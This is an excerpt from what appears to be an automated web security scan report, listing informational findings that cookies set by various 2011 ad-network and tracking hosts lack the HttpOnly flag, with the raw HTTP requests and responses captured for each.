12.242. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:45:49 GMT
Content-Length: 4640
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59987_1_3ExLT; Domain=.contextweb.com; Expires=Mon, 16-Sep-2041 21:45:48 GMT; Path=/
Set-Cookie: CDSActionTracking6=FThamvpMfUa4|PpAVCxNh2PJr|539292|3102|7113|59987|135586|107784|4|0|0|bostonherald.com|2|8|1|0|2|1|2|FT049.EMON2.EHEX1.SMTC1.FACO1|1|0|0NHN21JG2RchDYX7G0tJH6jJgXPyCqsz|I|3Ebil|3P3AN; Domain=.contextweb.com; Expires=Sun, 16-Oct-2011 21:45:48 GMT; Path=/
Set-Cookie: vf=724; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3CIFRAME%20SRC%3D%22http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN4441.contextweb.com%2FB5620293.7%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fcdslog.contextweb.com%2FCDSLogger
...[SNIP]...

12.243. http://tenzing.fmpub.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tenzing.fmpub.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?t=s&n=421 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltuid=1e26f8d5f332f1261c9af6b2d31021eb; vuid=1e26f8d5f332f1261c9af6b2d31021eb

Response

HTTP/1.0 204 No Content
Date: Sat, 17 Sep 2011 01:36:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ltuid=7b1c7a91b033a04c133102db8c6d238d9; expires=Sat, 17-Sep-2016 01:36:04 GMT; path=/; domain=.fmpub.net
Set-Cookie: vuid=7b1c7a91b033a04c133102db8c6d238d9; expires=Sat, 17-Sep-2011 02:06:04 GMT; path=/; domain=.fmpub.net
Content-Length: 0
X-Server: adserver5.tor.fmpub.net
Connection: close
Content-Type: application/x-javascript


12.244. http://testdm.travelers.com/trvwics.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1316220790&click=http://ads.bluelithium.com/clk?3,eAGlUU1vm0AU.DNVD5XLsl.sErSqltgmBGNibIeQS7SwxghDcaljB..60sRWeu.oSTN6hzczehA7DFqI5VpRvbELnWEHYsSILiyq9ch0HAdDTDm2KLdGtHKVDGbak-4vf7-WH-j294uL.Ev-RbtSDuNNp8Fx4HcE6vfbRf4njZN4cTUaePtxDidPhR77VzspxylNk3mTnn00S9an9JwfwtW0Dm9hGSU-nK1y8rzSu3D12My9-S78TCVG5eGwvwFgW7eZqg3VaaNXZdsaeduApe8JSDuiXi1IQCgYZxxjAxLCqW3zQWCE3zeImoQwBMaifWletmApEISUI2wRfhPGk1uQilTeRRGYPD0IiIdvIGZzG8yE9VpObBT40UO3l.G-WtXGqVqc.bDUTO3omeG1dOFCAldw2BfLdeulzek7uL-cMRm3KcImYSAQVBKU3PmdzKsoVvPDcxw9mhJIYSFOBkMQCxN8-3Jt3Tbbf-q-lR1QGjTdJgef8X90m0KosjNz3R5rrLHuKe1P5THraZUh8.j10O42P0VGGNWKcA51YROTm1Azy-ZK2RpCS2V.AGxotwo=,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C; ad_guid_imp=02681f8c-adb3-47e9-b8c3-1bfbf322e8e8~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:48.16.314 AM EDT

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=a3102062-ba1a-45de-826e-d21223ca6ccb~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/16/2011 08:55.02.373 PM EDT; Domain=.travelers.com; Expires=Sun, 16-Sep-12 00:55:02 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

12.245. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.246. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:28 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@2@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.247. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@3@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:16 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.248. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.249. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@2@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:40 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@3@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

12.250. http://traffic.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0 HTTP/1.1
Host: traffic.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220942842; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="PHPHrMMi4tB/TUzMDhNLuExtgrPUidZw2SkL41O19PL40iJ3cmuxL0CBz/AZPclyarqHKgLRZADwwyrf9Wxp503sC1vv7gThts/kVuXGq+6RePDwdpIv9I9eUye8TAoxesWFaLltsC0="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="WOCZPPRgUVeQ3XCS2OoI48rf6g9SSjSCZlMhWyZJP/HjJ1nS2BO6WvFWNYQF78qoU+fNRUM+rQBZCc9A1uQeXHxeY8GsogNrScHQXkaR7ugqy2ogff13YSmXftEP5JyF9XVu3bYtlRJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2=H6lta0Gb5dPegbOhXE7G4uRdkwHPmlC5; Domain=outbrain.com; Expires=Sat, 13-Oct-2012 01:00:13 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 348
Date: Sat, 17 Sep 2011 01:00:12 GMT

<html>
   <body onload="document.location.replace('http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/')">
       <form method="get" action="h
...[SNIP]...

12.251. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u-ads.adap.tv
Path:   /a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==?cb=1316239703&pet=preroll&pageUrl=newsinc.com&eov=eov HTTP/1.1
Host: u-ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: unique_ad_source_impression="20718%2C20716__TIME__2011-09-14+05%3A39%3A11"; asptvw1="as-2%2C1%2C2011-09-14%2F08-14-57"; adsrcvw1="27169%2C1%2C2011-09-15%2F07-14-57+c17252%2C1%2C2011-09-21%2F07-14-57+c17667%2C1%2C2011-09-15%2F05-45-56+27168%2C1%2C2011-09-15%2F05-39-11+c17253%2C1%2C2011-09-21%2F05-39-11"; creativeViews="{\"v\":1,\"views\":[{\"id\":9866,\"ts\":1316003951,\"cts\":null},{\"id\":9699,\"ts\":1316009697,\"cts\":null}]}"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"24\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"2\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"21\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"27\":{\"f\":1318575600,\"e\":1323759600,\"s\":[],\"a\":[]}}}"; rtbData0="key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true,key=turn:value=2944787775510337379:expiresAt=Wed+Sep+21+05%3A39%3A13+PDT+2011:32-Compatible=true,key=tidaltv:value=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77:expiresAt=Sun+Nov+13+06%3A14%3A58+PDT+2011:32-Compatible=true,key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Sun+Nov+13+06%3A15%3A00+PST+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A06%3A19"; marketTransaction="true__TIME__2011-09-14+05%3A39%3A04"; adaptv_page_url=oOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A06%3A58";Path=/;Domain=.adap.tv;Expires=Mon, 16-Sep-13 01:06:58 GMT
Content-Type: text/xml; charset=iso-8859-1
Set-Cookie: marketTransaction="true__TIME__2011-09-14+05%3A39%3A04";Path=/;Domain=.adap.tv;Expires=Fri, 14-Oct-11 12:39:03 GMT
Set-Cookie: adaptv_page_url=oOt0lqLFswM_;Path=/;Domain=.adap.tv
Content-Length: 104

<?xml version="1.0" encoding="UTF-8"?><VAST version="2.0"><error><![CDATA[Err code: 3]]></error></VAST>

12.252. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u-ads.adap.tv
Path:   /a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99?cb=1316239351&pet=preroll&pageUrl=newsinc.com&eov=eov HTTP/1.1
Host: u-ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: unique_ad_source_impression="20718%2C20716__TIME__2011-09-14+05%3A39%3A11"; asptvw1="as-2%2C1%2C2011-09-14%2F08-14-57"; adsrcvw1="27169%2C1%2C2011-09-15%2F07-14-57+c17252%2C1%2C2011-09-21%2F07-14-57+c17667%2C1%2C2011-09-15%2F05-45-56+27168%2C1%2C2011-09-15%2F05-39-11+c17253%2C1%2C2011-09-21%2F05-39-11"; creativeViews="{\"v\":1,\"views\":[{\"id\":9866,\"ts\":1316003951,\"cts\":null},{\"id\":9699,\"ts\":1316009697,\"cts\":null}]}"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"24\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"2\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"21\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"27\":{\"f\":1318575600,\"e\":1323759600,\"s\":[],\"a\":[]}}}"; rtbData0="key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true,key=turn:value=2944787775510337379:expiresAt=Wed+Sep+21+05%3A39%3A13+PDT+2011:32-Compatible=true,key=tidaltv:value=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77:expiresAt=Sun+Nov+13+06%3A14%3A58+PDT+2011:32-Compatible=true,key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Sun+Nov+13+06%3A15%3A00+PST+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A00%3A32"; marketTransaction="true__TIME__2011-09-14+05%3A39%3A04"; adaptv_page_url=oOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A01%3A07";Path=/;Domain=.adap.tv;Expires=Mon, 16-Sep-13 01:01:07 GMT
Content-Type: text/xml; charset=iso-8859-1
Set-Cookie: marketTransaction="true__TIME__2011-09-14+05%3A39%3A04";Path=/;Domain=.adap.tv;Expires=Fri, 14-Oct-11 12:39:03 GMT
Set-Cookie: adaptv_page_url=oOt0lqLFswM_;Path=/;Domain=.adap.tv
